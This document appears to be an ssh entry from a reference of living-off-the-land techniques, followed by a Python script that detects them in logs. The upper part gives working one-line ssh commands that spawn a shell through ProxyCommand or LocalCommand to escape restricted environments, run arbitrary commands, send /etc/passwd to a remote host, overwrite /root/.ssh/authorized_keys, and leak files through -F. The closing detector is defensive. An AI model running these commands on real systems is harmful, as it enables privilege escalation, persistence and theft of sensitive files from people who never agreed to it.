It can be used to break out from restricted environments by spawning an interactive system shell.
Spawn interactive shell on client. Does not require a successful connection.
ssh -o ProxyCommand=';sh 0<&2 1>&2' host
Spawn interactive shell on client. Requires a successful connection towards
ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
It can be used to break out from the intended program by running non-interactive system commands.
Does not require a successful connection.
ssh -o ProxyCommand=';uname -a 1>&2' host
It can exfiltrate files on the network.
Sends a local file (/etc/passwd) to a remote SSH server and saves it in a location (
ssh host "cat > /tmp/out" < /etc/passwd
It can download remote files.
Retrieves a remote file from an SSH server (/tmp/infile) and saves it to a local destination (
ssh host "cat /tmp/infile" > /root/.ssh/authorized_keys
It reads data from files and may be used to perform privileged reads or disclose files outside a restricted file system.
Reads a file and outputs it in an error message.
ssh -F /etc/passwd host
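For detection, the options used above can be flagged in process-execution logs. The following is an added example, not part of the original page: it walks a logged ssh command line the way the client's option parser would and reports -o keywords that run a local command and -F files outside an allow-list. The names audit_ssh_cmdline, ALLOWED_CONFIGS and the benign sample line are assumptions made for the illustration.

```python
import re
import shlex

TAKES_VALUE = set("BbcDEeFIiJLlmOoPpQRSWw")  # value-taking options, per ssh(1)
# ssh_config keywords that make the client run a local command.
EXEC_KEYWORDS = {"proxycommand", "localcommand", "permitlocalcommand"}
# Assumption: the only file -F should name in this environment.
ALLOWED_CONFIGS = {"/etc/ssh/ssh_config"}
# Constructed log lines: three built from the page's commands, one benign.
SAMPLES = [
    "ssh -o ProxyCommand=';sh 0<&2 1>&2' host",
    "ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host",
    "ssh -F /etc/passwd host",
    "ssh -p 2222 admin@host uptime",
]

def audit_ssh_cmdline(cmdline):
    """Return findings for one logged ssh command line (empty list if clean)."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    findings, seen_host, i = [], False, 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if not arg.startswith("-") or arg == "-":
            if seen_host:      # second bare word starts the remote command
                break
            seen_host = True   # OpenSSH still parses options after the host
            continue
        cluster = arg[1:]
        for pos, flag in enumerate(cluster):   # handles clusters such as -vo
            if flag in TAKES_VALUE:
                value = cluster[pos + 1:]      # attached form, e.g. -oKey=val
                if not value and i < len(argv):
                    value = argv[i]            # detached form: next argument
                    i += 1
                if flag == "o":
                    key = re.split(r"[=\s]", value.strip(), maxsplit=1)[0].lower()
                    if key in EXEC_KEYWORDS:
                        findings.append(f"-o {key}: {value}")
                elif flag == "F" and value not in ALLOWED_CONFIGS:
                    findings.append(f"-F {value}")
                break
    return findings

if __name__ == "__main__":
    for line in SAMPLES:
        print(audit_ssh_cmdline(line) or "clean", "<-", line)
```
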